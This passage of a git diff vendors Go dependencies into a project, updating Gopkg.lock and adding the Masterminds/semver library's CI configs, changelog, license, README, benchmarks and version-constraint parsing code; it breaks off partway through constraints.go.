 create mode 100644 vendor/github.com/imdario/mergo/mergo.go
 create mode 100644 vendor/github.com/imdario/mergo/mergo_test.go
 create mode 100644 vendor/github.com/imdario/mergo/pr80_test.go
 create mode 100644 vendor/github.com/imdario/mergo/pr81_test.go
 create mode 100644 vendor/github.com/imdario/mergo/testdata/license.yml
 create mode 100644 vendor/github.com/imdario/mergo/testdata/thing.yml

diff --git a/Gopkg.lock b/Gopkg.lock
index 19c0ad71bb..dc144cf25f 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -1,6 +1,30 @@
 # This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
 
 
+[[projects]]
+  name = "github.com/Masterminds/semver"
+  packages = ["."]
+  revision = "c7af12943936e8c39859482e61f0574c2fd7fc75"
+  version = "v1.4.2"
+
+[[projects]]
+  name = "github.com/Masterminds/sprig"
+  packages = ["."]
+  revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c"
+  version = "v2.15.0"
+
+[[projects]]
+  name = "github.com/Sirupsen/logrus"
+  packages = ["."]
+  revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc"
+  version = "v1.0.5"
+
+[[projects]]
+  name = "github.com/aokoli/goutils"
+  packages = ["."]
+  revision = "3391d3790d23d03408670993e957e8f408993c34"
+  version = "v1.0.1"
+
 [[projects]]
   name = "github.com/boltdb/bolt"
   packages = ["."]
@@ -13,6 +37,18 @@
   revision = "48dbb65d7bd5c74ab50d53d04c949f20e3d14944"
   version = "1.0"
 
+[[projects]]
+  name = "github.com/davecgh/go-spew"
+  packages = ["spew"]
+  revision = "346938d642f2ec3594ed81d874461961cd0faa76"
+  version = "v1.1.0"
+
+[[projects]]
+  name = "github.com/docker/docker"
+  packages = ["pkg/fileutils"]
+  revision = "092cba3727bb9b4a2f0e922cd6c0f93ea270e363"
+  version = "v1.13.1"
+
 [[projects]]
   branch = "master"
   name = "github.com/elazarl/go-bindata-assetfs"
@@ -37,6 +73,12 @@
   revision = "629574ca2a5df945712d3079857300b5e4da0236"
   version = "v1.4.2"
 
+[[projects]]
+  name = "github.com/go-ozzo/ozzo-validation"
+  packages = ["."]
+  revision = "85dcd8368eba387e65a03488b003e233994e87e9"
+  version = "v3.3"
+
 [[projects]]
   name = "github.com/go-test/deep"
   packages = ["."]
@@ -55,6 +97,12 @@
   packages = ["query"]
   revision = "53e6ce116135b80d037921a7fdd5138cf32d7a8a"
 
+[[projects]]
+  name = "github.com/google/uuid"
+  packages = ["."]
+  revision = "064e2069ce9c359c118179501254f67d7d37ba24"
+  version = "0.2"
+
 [[projects]]
   name = "github.com/gorilla/context"
   packages = ["."]
@@ -101,6 +149,18 @@
   ]
   revision = "68e816d1c783414e79bc65b3994d9ab6b0a722ab"
 
+[[projects]]
+  name = "github.com/huandu/xstrings"
+  packages = ["."]
+  revision = "2bf18b218c51864a87384c06996e40ff9dcff8e1"
+  version = "v1.0.0"
+
+[[projects]]
+  name = "github.com/imdario/mergo"
+  packages = ["."]
+  revision = "9316a62528ac99aaecb4e47eadd6dc8aa6533d58"
+  version = "v0.3.5"
+
 [[projects]]
   name = "github.com/inconshreveable/mousetrap"
   packages = ["."]
@@ -248,7 +308,11 @@
 [[projects]]
   branch = "master"
   name = "golang.org/x/crypto"
-  packages = ["ssh/terminal"]
+  packages = [
+    "pbkdf2",
+    "scrypt",
+    "ssh/terminal"
+  ]
   revision = "7d9177d70076375b9a59c8fde23d52d9c4a7ecd5"
 
 [[projects]]
@@ -288,6 +352,6 @@
 [solve-meta]
   analyzer-name = "dep"
   analyzer-version = 1
-  inputs-digest = "6e38170b3ac78890d7f3af87171bc9ccf81083b5196342b2f5acea10125872bd"
+  inputs-digest = "148489fcbc8e0f37944adc0eb2f9f187995790c5107188e9f4bebb79f7989434"
   solver-name = "gps-cdcl"
   solver-version = 1
diff --git a/vendor/github.com/Masterminds/semver/.travis.yml b/vendor/github.com/Masterminds/semver/.travis.yml
new file mode 100644
index 0000000000..3d9ebadb93
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/.travis.yml
@@ -0,0 +1,27 @@
+language: go
+
+go:
+  - 1.6.x
+  - 1.7.x
+  - 1.8.x
+  - 1.9.x
+  - 1.10.x
+  - tip
+
+# Setting sudo access to false will let Travis CI use containers rather than
+# VMs to run the tests. For more details see:
+# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/
+# - http://docs.travis-ci.com/user/workers/standard-infrastructure/
+sudo: false
+
+script:
+  - make setup
+  - make test
+
+notifications:
+  webhooks:
+    urls:
+      - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+    on_success: change  # options: [always|never|change] default: always
+    on_failure: always  # options: [always|never|change] default: always
+    on_start: never     # options: [always|never|change] default: always
diff --git a/vendor/github.com/Masterminds/semver/CHANGELOG.md b/vendor/github.com/Masterminds/semver/CHANGELOG.md
new file mode 100644
index 0000000000..b888e20aba
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/CHANGELOG.md
@@ -0,0 +1,86 @@
+# 1.4.2 (2018-04-10)
+
+## Changed
+- #72: Updated the docs to point to vert for a console appliaction
+- #71: Update the docs on pre-release comparator handling
+
+## Fixed
+- #70: Fix the handling of pre-releases and the 0.0.0 release edge case
+
+# 1.4.1 (2018-04-02)
+
+## Fixed
+- Fixed #64: Fix pre-release precedence issue (thanks @uudashr)
+
+# 1.4.0 (2017-10-04)
+
+## Changed
+- #61: Update NewVersion to parse ints with a 64bit int size (thanks @zknill)
+
+# 1.3.1 (2017-07-10)
+
+## Fixed
+- Fixed #57: number comparisons in prerelease sometimes inaccurate
+
+# 1.3.0 (2017-05-02)
+
+## Added
+- #45: Added json (un)marshaling support (thanks @mh-cbon)
+- Stability marker. See https://masterminds.github.io/stability/
+
+## Fixed
+- #51: Fix handling of single digit tilde constraint (thanks @dgodd)
+
+## Changed
+- #55: The godoc icon moved from png to svg
+
+# 1.2.3 (2017-04-03)
+
+## Fixed
+- #46: Fixed 0.x.x and 0.0.x in constraints being treated as *
+
+# Release 1.2.2 (2016-12-13)
+
+## Fixed
+- #34: Fixed issue where hyphen range was not working with pre-release parsing.
+
+# Release 1.2.1 (2016-11-28)
+
+## Fixed
+- #24: Fixed edge case issue where constraint "> 0" does not handle "0.0.1-alpha"
+  properly.
+
+# Release 1.2.0 (2016-11-04)
+
+## Added
+- #20: Added MustParse function for versions (thanks @adamreese)
+- #15: Added increment methods on versions (thanks @mh-cbon)
+
+## Fixed
+- Issue #21: Per the SemVer spec (section 9) a pre-release is unstable and
+  might not satisfy the intended compatibility. The change here ignores pre-releases
+  on constraint checks (e.g., ~ or ^) when a pre-release is not part of the
+  constraint. For example, `^1.2.3` will ignore pre-releases while
+  `^1.2.3-alpha` will include them.
+
+# Release 1.1.1 (2016-06-30)
+
+## Changed
+- Issue #9: Speed up version comparison performance (thanks @sdboyer)
+- Issue #8: Added benchmarks (thanks @sdboyer)
+- Updated Go Report Card URL to new location
+- Updated Readme to add code snippet formatting (thanks @mh-cbon)
+- Updating tagging to v[SemVer] structure for compatibility with other tools.
+
+# Release 1.1.0 (2016-03-11)
+
+- Issue #2: Implemented validation to provide reasons a versions failed a
+  constraint.
+
+# Release 1.0.1 (2015-12-31)
+
+- Fixed #1: * constraint failing on valid versions.
+
+# Release 1.0.0 (2015-10-20)
+
+- Initial release
diff --git a/vendor/github.com/Masterminds/semver/LICENSE.txt b/vendor/github.com/Masterminds/semver/LICENSE.txt
new file mode 100644
index 0000000000..0da4aeadb0
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/LICENSE.txt
@@ -0,0 +1,20 @@
+The Masterminds
+Copyright (C) 2014-2015, Matt Butcher and Matt Farina
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Masterminds/semver/Makefile b/vendor/github.com/Masterminds/semver/Makefile
new file mode 100644
index 0000000000..a7a1b4e36d
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/Makefile
@@ -0,0 +1,36 @@
+.PHONY: setup
+setup:
+	go get -u gopkg.in/alecthomas/gometalinter.v1
+	gometalinter.v1 --install
+
+.PHONY: test
+test: validate lint
+	@echo "==> Running tests"
+	go test -v
+
+.PHONY: validate
+validate:
+	@echo "==> Running static validations"
+	@gometalinter.v1 \
+	  --disable-all \
+	  --enable deadcode \
+	  --severity deadcode:error \
+	  --enable gofmt \
+	  --enable gosimple \
+	  --enable ineffassign \
+	  --enable misspell \
+	  --enable vet \
+	  --tests \
+	  --vendor \
+	  --deadline 60s \
+	  ./... || exit_code=1
+
+.PHONY: lint
+lint:
+	@echo "==> Running linters"
+	@gometalinter.v1 \
+	  --disable-all \
+	  --enable golint \
+	  --vendor \
+	  --deadline 60s \
+	  ./... || :
diff --git a/vendor/github.com/Masterminds/semver/README.md b/vendor/github.com/Masterminds/semver/README.md
new file mode 100644
index 0000000000..3e934ed71e
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/README.md
@@ -0,0 +1,165 @@
+# SemVer
+
+The `semver` package provides the ability to work with [Semantic Versions](http://semver.org) in Go. Specifically it provides the ability to:
+
+* Parse semantic versions
+* Sort semantic versions
+* Check if a semantic version fits within a set of constraints
+* Optionally work with a `v` prefix
+
+[![Stability:
+Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html)
+[![Build Status](https://travis-ci.org/Masterminds/semver.svg)](https://travis-ci.org/Masterminds/semver) [![Build status](https://ci.appveyor.com/api/projects/status/jfk66lib7hb985k8/branch/master?svg=true&passingText=windows%20build%20passing&failingText=windows%20build%20failing)](https://ci.appveyor.com/project/mattfarina/semver/branch/master) [![GoDoc](https://godoc.org/github.com/Masterminds/semver?status.svg)](https://godoc.org/github.com/Masterminds/semver) [![Go Report Card](https://goreportcard.com/badge/github.com/Masterminds/semver)](https://goreportcard.com/report/github.com/Masterminds/semver)
+
+## Parsing Semantic Versions
+
+To parse a semantic version use the `NewVersion` function. For example,
+
+```go
+    v, err := semver.NewVersion("1.2.3-beta.1+build345")
+```
+
+If there is an error the version wasn't parseable. The version object has methods
+to get the parts of the version, compare it to other versions, convert the
+version back into a string, and get the original string. For more details
+please see the [documentation](https://godoc.org/github.com/Masterminds/semver).
+
+## Sorting Semantic Versions
+
+A set of versions can be sorted using the [`sort`](https://golang.org/pkg/sort/)
+package from the standard library. For example,
+
+```go
+    raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",}
+    vs := make([]*semver.Version, len(raw))
+	for i, r := range raw {
+		v, err := semver.NewVersion(r)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		vs[i] = v
+	}
+
+	sort.Sort(semver.Collection(vs))
+```
+
+## Checking Version Constraints
+
+Checking a version against version constraints is one of the most featureful
+parts of the package.
+
+```go
+    c, err := semver.NewConstraint(">= 1.2.3")
+    if err != nil {
+        // Handle constraint not being parseable.
+    }
+
+    v, _ := semver.NewVersion("1.3")
+    if err != nil {
+        // Handle version not being parseable.
+    }
+    // Check if the version meets the constraints. The a variable will be true.
+    a := c.Check(v)
+```
+
+## Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma separated and comparisons. These are then separated by || separated or
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+* `=`: equal (aliased to no operator)
+* `!=`: not equal
+* `>`: greater than
+* `<`: less than
+* `>=`: greater than or equal to
+* `<=`: less than or equal to
+
+_Note, according to the Semantic Version specification pre-releases may not be
+API compliant with their release counterpart. It says,_
+
+> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._
+
+_SemVer comparisons without a pre-release value will skip pre-release versions.
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphens ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the pack level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `<= 3`
+* `*` is equivalent to `>= 0.0.0`
+
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparisons of API versions as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
+# Validation
+
+In addition to testing a version against a constraint, a version can be validated
+against a constraint. When validation fails a slice of errors containing why a
+version didn't meet the constraint is returned. For example,
+
+```go
+    c, err := semver.NewConstraint("<= 1.2.3, >= 1.4")
+    if err != nil {
+        // Handle constraint not being parseable.
+    }
+
+    v, _ := semver.NewVersion("1.3")
+    if err != nil {
+        // Handle version not being parseable.
+    }
+
+    // Validate a version against a constraint.
+    a, msgs := c.Validate(v)
+    // a is false
+    for _, m := range msgs {
+        fmt.Println(m)
+
+        // Loops over the errors which would read
+        // "1.3 is greater than 1.2.3"
+        // "1.3 is less than 1.4"
+    }
+```
+
+# Contribute
+
+If you find an issue or want to contribute please file an [issue](https://github.com/Masterminds/semver/issues)
+or [create a pull request](https://github.com/Masterminds/semver/pulls).
diff --git a/vendor/github.com/Masterminds/semver/appveyor.yml b/vendor/github.com/Masterminds/semver/appveyor.yml
new file mode 100644
index 0000000000..b2778df15a
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/appveyor.yml
@@ -0,0 +1,44 @@
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\semver
+shallow_clone: true
+
+environment:
+  GOPATH: C:\gopath
+
+platform:
+  - x64
+
+install:
+  - go version
+  - go env
+  - go get -u gopkg.in/alecthomas/gometalinter.v1
+  - set PATH=%PATH%;%GOPATH%\bin
+  - gometalinter.v1.exe --install
+
+build_script:
+  - go install -v ./...
+
+test_script:
+  - "gometalinter.v1 \
+    --disable-all \
+    --enable deadcode \
+    --severity deadcode:error \
+    --enable gofmt \
+    --enable gosimple \
+    --enable ineffassign \
+    --enable misspell \
+    --enable vet \
+    --tests \
+    --vendor \
+    --deadline 60s \
+    ./... || exit_code=1"
+  - "gometalinter.v1 \
+    --disable-all \
+    --enable golint \
+    --vendor \
+    --deadline 60s \
+    ./... || :"
+  - go test -v
+
+deploy: off
diff --git a/vendor/github.com/Masterminds/semver/benchmark_test.go b/vendor/github.com/Masterminds/semver/benchmark_test.go
new file mode 100644
index 0000000000..58a5c289f4
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/benchmark_test.go
@@ -0,0 +1,157 @@
+package semver_test
+
+import (
+	"testing"
+
+	"github.com/Masterminds/semver"
+)
+
+/* Constraint creation benchmarks */
+
+func benchNewConstraint(c string, b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		semver.NewConstraint(c)
+	}
+}
+
+func BenchmarkNewConstraintUnary(b *testing.B) {
+	benchNewConstraint("=2.0", b)
+}
+
+func BenchmarkNewConstraintTilde(b *testing.B) {
+	benchNewConstraint("~2.0.0", b)
+}
+
+func BenchmarkNewConstraintCaret(b *testing.B) {
+	benchNewConstraint("^2.0.0", b)
+}
+
+func BenchmarkNewConstraintWildcard(b *testing.B) {
+	benchNewConstraint("1.x", b)
+}
+
+func BenchmarkNewConstraintRange(b *testing.B) {
+	benchNewConstraint(">=2.1.x, <3.1.0", b)
+}
+
+func BenchmarkNewConstraintUnion(b *testing.B) {
+	benchNewConstraint("~2.0.0 || =3.1.0", b)
+}
+
+/* Check benchmarks */
+
+func benchCheckVersion(c, v string, b *testing.B) {
+	version, _ := semver.NewVersion(v)
+	constraint, _ := semver.NewConstraint(c)
+
+	for i := 0; i < b.N; i++ {
+		constraint.Check(version)
+	}
+}
+
+func BenchmarkCheckVersionUnary(b *testing.B) {
+	benchCheckVersion("=2.0", "2.0.0", b)
+}
+
+func BenchmarkCheckVersionTilde(b *testing.B) {
+	benchCheckVersion("~2.0.0", "2.0.5", b)
+}
+
+func BenchmarkCheckVersionCaret(b *testing.B) {
+	benchCheckVersion("^2.0.0", "2.1.0", b)
+}
+
+func BenchmarkCheckVersionWildcard(b *testing.B) {
+	benchCheckVersion("1.x", "1.4.0", b)
+}
+
+func BenchmarkCheckVersionRange(b *testing.B) {
+	benchCheckVersion(">=2.1.x, <3.1.0", "2.4.5", b)
+}
+
+func BenchmarkCheckVersionUnion(b *testing.B) {
+	benchCheckVersion("~2.0.0 || =3.1.0", "3.1.0", b)
+}
+
+func benchValidateVersion(c, v string, b *testing.B) {
+	version, _ := semver.NewVersion(v)
+	constraint, _ := semver.NewConstraint(c)
+
+	for i := 0; i < b.N; i++ {
+		constraint.Validate(version)
+	}
+}
+
+/* Validate benchmarks, including fails */
+
+func BenchmarkValidateVersionUnary(b *testing.B) {
+	benchValidateVersion("=2.0", "2.0.0", b)
+}
+
+func BenchmarkValidateVersionUnaryFail(b *testing.B) {
+	benchValidateVersion("=2.0", "2.0.1", b)
+}
+
+func BenchmarkValidateVersionTilde(b *testing.B) {
+	benchValidateVersion("~2.0.0", "2.0.5", b)
+}
+
+func BenchmarkValidateVersionTildeFail(b *testing.B) {
+	benchValidateVersion("~2.0.0", "1.0.5", b)
+}
+
+func BenchmarkValidateVersionCaret(b *testing.B) {
+	benchValidateVersion("^2.0.0", "2.1.0", b)
+}
+
+func BenchmarkValidateVersionCaretFail(b *testing.B) {
+	benchValidateVersion("^2.0.0", "4.1.0", b)
+}
+
+func BenchmarkValidateVersionWildcard(b *testing.B) {
+	benchValidateVersion("1.x", "1.4.0", b)
+}
+
+func BenchmarkValidateVersionWildcardFail(b *testing.B) {
+	benchValidateVersion("1.x", "2.4.0", b)
+}
+
+func BenchmarkValidateVersionRange(b *testing.B) {
+	benchValidateVersion(">=2.1.x, <3.1.0", "2.4.5", b)
+}
+
+func BenchmarkValidateVersionRangeFail(b *testing.B) {
+	benchValidateVersion(">=2.1.x, <3.1.0", "1.4.5", b)
+}
+
+func BenchmarkValidateVersionUnion(b *testing.B) {
+	benchValidateVersion("~2.0.0 || =3.1.0", "3.1.0", b)
+}
+
+func BenchmarkValidateVersionUnionFail(b *testing.B) {
+	benchValidateVersion("~2.0.0 || =3.1.0", "3.1.1", b)
+}
+
+/* Version creation benchmarks */
+
+func benchNewVersion(v string, b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		semver.NewVersion(v)
+	}
+}
+
+func BenchmarkNewVersionSimple(b *testing.B) {
+	benchNewVersion("1.0.0", b)
+}
+
+func BenchmarkNewVersionPre(b *testing.B) {
+	benchNewVersion("1.0.0-alpha", b)
+}
+
+func BenchmarkNewVersionMeta(b *testing.B) {
+	benchNewVersion("1.0.0+metadata", b)
+}
+
+func BenchmarkNewVersionMetaDash(b *testing.B) {
+	benchNewVersion("1.0.0+metadata-dash", b)
+}
diff --git a/vendor/github.com/Masterminds/semver/collection.go b/vendor/github.com/Masterminds/semver/collection.go
new file mode 100644
index 0000000000..a78235895f
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/collection.go
@@ -0,0 +1,24 @@
+package semver
+
+// Collection is a collection of Version instances and implements the sort
+// interface. See the sort package for more details.
+// https://golang.org/pkg/sort/
+type Collection []*Version
+
+// Len returns the length of a collection. The number of Version instances
+// on the slice.
+func (c Collection) Len() int {
+	return len(c)
+}
+
+// Less is needed for the sort interface to compare two Version objects on the
+// slice. If checks if one is less than the other.
+func (c Collection) Less(i, j int) bool {
+	return c[i].LessThan(c[j])
+}
+
+// Swap is needed for the sort interface to replace the Version objects
+// at two different positions in the slice.
+func (c Collection) Swap(i, j int) {
+	c[i], c[j] = c[j], c[i]
+}
diff --git a/vendor/github.com/Masterminds/semver/collection_test.go b/vendor/github.com/Masterminds/semver/collection_test.go
new file mode 100644
index 0000000000..71b909c4e0
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/collection_test.go
@@ -0,0 +1,46 @@
+package semver
+
+import (
+	"reflect"
+	"sort"
+	"testing"
+)
+
+func TestCollection(t *testing.T) {
+	raw := []string{
+		"1.2.3",
+		"1.0",
+		"1.3",
+		"2",
+		"0.4.2",
+	}
+
+	vs := make([]*Version, len(raw))
+	for i, r := range raw {
+		v, err := NewVersion(r)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		vs[i] = v
+	}
+
+	sort.Sort(Collection(vs))
+
+	e := []string{
+		"0.4.2",
+		"1.0.0",
+		"1.2.3",
+		"1.3.0",
+		"2.0.0",
+	}
+
+	a := make([]string, len(vs))
+	for i, v := range vs {
+		a[i] = v.String()
+	}
+
+	if !reflect.DeepEqual(a, e) {
+		t.Error("Sorting Collection failed")
+	}
+}
diff --git a/vendor/github.com/Masterminds/semver/constraints.go b/vendor/github.com/Masterminds/semver/constraints.go
new file mode 100644
index 0000000000..a41a6a7a4a
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/constraints.go
@@ -0,0 +1,426 @@
+package semver
+
+import (
+	"errors"
+	"fmt"
+	"regexp"
+	"strings"
+)
+
+// Constraints is one or more constraint that a semantic version can be
+// checked against.
+type Constraints struct {
+	constraints [][]*constraint
+}
+
+// NewConstraint returns a Constraints instance that a Version instance can
+// be checked against. If there is a parse error it will be returned.
+func NewConstraint(c string) (*Constraints, error) {
+
+	// Rewrite - ranges into a comparison operation.
+	c = rewriteRange(c)
+
+	ors := strings.Split(c, "||")
+	or := make([][]*constraint, len(ors))
+	for k, v := range ors {
+		cs := strings.Split(v, ",")
+		result := make([]*constraint, len(cs))
+		for i, s := range cs {
+			pc, err := parseConstraint(s)
+			if err != nil {
+				return nil, err
+			}
+
+			result[i] = pc
+		}
+		or[k] = result
+	}
+
+	o := &Constraints{constraints: or}
+	return o, nil
+}
+
+// Check tests if a version satisfies the constraints.
+func (cs Constraints) Check(v *Version) bool {
+	// loop over the ORs and check the inner ANDs
+	for _, o := range cs.constraints {
+		joy := true
+		for _, c := range o {
+			if !c.check(v) {
+				joy = false
+				break
+			}
+		}
+
+		if joy {
+			return true
+		}
+	}
+
+	return false
+}
+
+// Validate checks if a version satisfies a constraint. If not a slice of
+// reasons for the failure are returned in addition to a bool.
+func (cs Constraints) Validate(v *Version) (bool, []error) {
+	// loop over the ORs and check the inner ANDs
+	var e []error
+	for _, o := range cs.constraints {
+		joy := true
+		for _, c := range o {
+			if !c.check(v) {
+				em := fmt.Errorf(c.msg, v, c.orig)
+				e = append(e, em)
+				joy = false
+			}
+		}
+
+		if joy {
+			return true, []error{}
+		}
+	}
+
+	return false, e
+}
+
+var constraintOps map[string]cfunc
+var constraintMsg map[string]string
+var constraintRegex *regexp.Regexp
+
+func init() {
+	constraintOps = map[string]cfunc{
+		"":   constraintTildeOrEqual,
+		"=":  constraintTildeOrEqual,
+		"!=": constraintNotEqual,
+		">":  constraintGreaterThan,
+		"<":  constraintLessThan,
+		">=": constraintGreaterThanEqual,
+		"=>": constraintGreaterThanEqual,
+		"<=": constraintLessThanEqual,
+		"=<": constraintLessThanEqual,
+		"~":  constraintTilde,
+		"~>": constraintTilde,
+		"^":  constraintCaret,
+	}
+
+	constraintMsg = map[string]string{
+		"":   "%s is not equal to %s",
+		"=":  "%s is not equal to %s",
+		"!=": "%s is equal to %s",
+		">":  "%s is less than or equal to %s",
+		"<":  "%s is greater than or equal to %s",
+		">=": "%s is less than %s",
+		"=>": "%s is less than %s",
+		"<=": "%s is greater than %s",
+		"=<": "%s is greater than %s",
+		"~":  "%s does not have same major and minor version as %s",
+		"~>": "%s does not have same major and minor version as %s",
+		"^":  "%s does not have same major version as %s",
+	}
+
+	ops := make([]string, 0, len(constraintOps))
+	for k := range constraintOps {
+		ops = append(ops, regexp.QuoteMeta(k))
+	}
+
+	constraintRegex = regexp.MustCompile(fmt.Sprintf(
+		`^\s*(%s)\s*(%s)\s*$`,
+		strings.Join(ops, "|"),
+		cvRegex))
+
+	constraintRangeRegex = regexp.MustCompile(fmt.Sprintf(
+		`\s*(%s)\s+-\s+(%s)\s*`,
+		cvRegex, cvRegex))
+}
+
+// An individual constraint
+type constraint struct {
+	// The callback function for the restraint. It performs the logic for
+	// the constraint.
+	function cfunc
+
+	msg string
+
+	// The version used in the constraint check. For example, if a constraint
+	// is '<= 2.0.0' the con a version instance representing 2.0.0.
+	con *Version
+
+	// The original parsed version (e.g., 4.x from != 4.x)
+	orig string
+
+	// When an x is used as part of the version (e.g., 1.x)
+	minorDirty bool
+	dirty      bool
+	patchDirty bool
+}
+
+// Check if a version meets the constraint
+func (c *constraint) check(v *Version) bool {
+	return c.function(v, c)
+}
+
+type cfunc func(v *Version, c *constraint) bool
+
+func parseConstraint(c string) (*constraint, error) {
+	m := constraintRegex.FindStringSubmatch(c)
+	if m == nil {
+		return nil, fmt.Errorf("improper constraint: %s", c)
+	}
+
+	ver := m[2]
+	orig := ver
+	minorDirty := false
+	patchDirty := false
+	dirty := false
+	if isX(m[3]) {
+		ver = "0.0.0"
+		dirty = true
+	} else if isX(strings.TrimPrefix(m[4], ".")) || m[4] == "" {
+		minorDirty = true
+		dirty = true
+		ver = fmt.Sprintf("%s.0.0%s", m[3], m[6])
+	} else if isX(strings.TrimPrefix(m[5], ".")) {
+		dirty = true
+		patchDirty = true
+		ver = fmt.Sprintf("%s%s.0%s", m[3], m[4], m[6])
+	}
+
+	con, err := NewVersion(ver)
+	if err != nil {
+
+		// The constraintRegex should catch any regex parsing errors. So,
+		// we should never get here.
+		return nil, errors.New("constraint Parser Error")
+	}
+
+	cs := &constraint{
+		function:   constraintOps[m[1]],
+		msg:        constraintMsg[m[1]],
+		con:        con,
+		orig:       orig,
+		minorDirty: minorDirty,
+		patchDirty: patchDirty,
+		dirty:      dirty,
+	}
+	return cs, nil
+}
+
+// Constraint functions
+func constraintNotEqual(v *Version, c *constraint) bool {
+	if c.dirty {
+
+		// If there is a pre-release on the version but the constraint isn't looking
+		// for them assume that pre-releases are not compatible. See issue 21 for
+		// more details.
+		if v.Prerelease() != "" && c.con.Prerelease() == "" {
+			return false
+		}
+
+		if c.con.Major() != v.Major() {
+			return true
+		}
+		if c.con.Minor() != v.Minor() && !c.minorDirty {
+			return true
+		} else if c.minorDirty {
+			return false
+		}
+
+		return false
+	}
+
+	return !v.Equal(c.con)
+}
+
+func constraintGreaterThan(v *Version, c *constraint) bool {
+
+	// An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease
+	// exists. This that case.
+	if !isNonZero(c.con) && isNonZero(v) {
+		return true
+	}
+
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	return v.Compare(c.con) == 1
+}
+
+func constraintLessThan(v *Version, c *constraint) bool {
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	if !c.dirty {
+		return v.Compare(c.con) < 0
+	}
+
+	if v.Major() > c.con.Major() {
+		return false
+	} else if v.Minor() > c.con.Minor() && !c.minorDirty {
+		return false
+	}
+
+	return true
+}
+
+func constraintGreaterThanEqual(v *Version, c *constraint) bool {
+	// An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease
+	// exists. This that case.
+	if !isNonZero(c.con) && isNonZero(v) {
+		return true
+	}
+
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	return v.Compare(c.con) >= 0
+}
+
+func constraintLessThanEqual(v *Version, c *constraint) bool {
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
